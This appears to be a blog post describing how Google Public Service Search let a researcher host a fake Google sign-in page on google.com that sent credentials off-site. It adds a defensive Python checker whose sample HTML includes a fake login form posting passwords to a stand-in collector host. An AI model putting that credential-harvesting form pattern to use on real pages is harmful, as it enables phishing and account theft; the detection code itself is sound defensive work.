Google Public Search service
Note: I had been holding back on this entry, but since this flaw has gone public elsewhere, I suppose it's okay to post again.
http://www.google.com/u/gplus
If you go to this website, it claims to give you access to a new Google Plus service. Don't believe it (go ahead and try it though).

Google Public Service Search allows universities and non-profit organizations to create a custom search portal that seems to be hosted on Google's servers. The page is arbitrary (made by the organization) and can thus contain forms that post to *any* server on the Web.
Eric Farraro has taken advantage of the lax filtering of how organizations get to use the service, and has put up a search portal that appears to be a Google service. The form, however, submits to another domain and deceptively takes a person's credentials too. When I visited the site, it appeared as if I was logging into a Google service (since it's on the google.com domain), but I ended up at a different site entirely.
People trust google.com to be Google, and not someone else. This case shows how someone can use the google.com domain but completely redirect unsuspecting people to another site.
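The core of the problem described above is a page served from a trusted origin whose login form submits somewhere else. The following is an added example, not code from this post, from Eric Farraro, or from Google: a small checker that parses an HTML page and flags any form that contains a password field but whose action resolves to a different origin than the page it was served from. The page URL is the one named in this post; the HTML is a constructed sample standing in for a portal page, and the function name find_cross_origin_credential_forms is my own.

```python
"""Flag HTML forms that collect a password but submit to another origin.

Added example (not the post's or Google's code). It assumes the page URL is
known (here the URL from the post) and uses a constructed sample page; the
function and class names are hypothetical.
"""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class _FormCollector(HTMLParser):
    """Record each <form>'s action and whether it contains a password input."""

    def __init__(self):
        super().__init__()
        self.forms = []      # list of {"action": str, "has_password": bool}
        self._current = None

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            self._current = {"action": attrs.get("action") or "", "has_password": False}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            if (attrs.get("type") or "").lower() == "password":
                self._current["has_password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def origin_of(url):
    """Return (scheme, host, port); two URLs are same-origin iff these match."""
    parts = urlsplit(url)
    return (parts.scheme.lower(), (parts.hostname or "").lower(), parts.port)


def find_cross_origin_credential_forms(page_url, html):
    """Return absolute action URLs of forms that ask for a password yet submit
    to an origin other than the page's own. A relative or empty action resolves
    against page_url, so posting back to the same host is not flagged."""
    parser = _FormCollector()
    parser.feed(html)
    page_origin = origin_of(page_url)
    suspicious = []
    for form in parser.forms:
        target = urljoin(page_url, form["action"])  # resolve relative actions
        if form["has_password"] and origin_of(target) != page_origin:
            suspicious.append(target)
    return suspicious


# Constructed sample: a portal page on google.com with a harmless search form
# and a second form that looks like a sign-in box but posts off-site.
SAMPLE_PAGE_URL = "http://www.google.com/u/gplus"
SAMPLE_HTML = """
<html><body>
<form action="search" method="get">
  <input type="text" name="q"><input type="submit" value="Search">
</form>
<form action="http://collector.example.net/login" method="post">
  <input type="text" name="Email"><input type="password" name="Passwd">
  <input type="submit" value="Sign in">
</form>
</body></html>
"""

if __name__ == "__main__":
    for url in find_cross_origin_credential_forms(SAMPLE_PAGE_URL, SAMPLE_HTML):
        print("credential form posts off-origin:", url)
```

Run as a script it prints the one off-origin target from the sample. The same check is what a hosting service that lets customers supply page content would want to apply at upload time, or what a browser extension could apply before a password is submitted.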
Links:
Link to discovery (and details)
Comments on Digg
Google Public Search services
(Thanks, Steve!)
UPDATE (15-Aug 4:05pm): Google has taken down the demo and replaced it with a 403: forbidden error. Screenshots are on Eric Farraro's site.